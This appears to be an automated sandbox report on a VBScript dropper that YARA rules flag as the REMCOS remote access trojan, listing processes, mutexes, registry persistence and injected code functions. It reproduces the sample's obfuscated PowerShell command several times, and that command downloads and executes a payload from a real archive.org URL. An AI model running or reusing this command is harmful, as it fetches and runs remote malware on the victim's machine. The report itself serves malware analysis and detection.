Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0043E320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0044A3A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0043343D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00437772
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00422727
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00433855
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0042286A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_004379A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00410ABB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0044AAB9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00437BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00421B92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00450BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00418CF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00433C8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00430DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0042DEA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00432F41

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 0042EC70 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 0042F2D0 appears 53 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00402064 appears 80 times

Source: Appraisa.vbs

Initial sample: Strings found which are bigger than 50

Source: 00000010.00000002.594396600.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda

Source: classification engine

Classification label: mal100.troj.spyw.evad.winVBS@8/11@3/4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_004131C5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_0040D006 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CreateMutexA,CloseHandle,

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_0040D277 FindResourceA,LoadResource,LockResource,SizeofResource,

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_00415BD3 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20210421

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Mutant created: \Sessions\1\BaseNamedObjects\Remcos-8VMXRX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nbyvf4gi.2e2.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Appraisa.vbs'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Appraisa.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')\|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\ Microsoft.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')\|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\ Microsoft.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Show sources

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("powershell $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent')", "0")

Obfuscated command line found

Show sources

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')\|I`E`X
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')\|I`E`X

Yara detected MSILLoadEncryptedAssembly

Show sources

Source: Yara match	File source: 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6632, type: MEMORY
Source: Yara match	File source: C:\Users\Public\ Microsoft.ps1, type: DROPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_0040CEDF LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0042F316 push ecx; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00456330 push esp; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00457435 push esi; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00450558 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0044FC36 push ecx; ret

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_00405C3E ShellExecuteW,URLDownloadToFileW,

Boot Survival:

Creates an undocumented autostart registry key

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_00415BD3 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
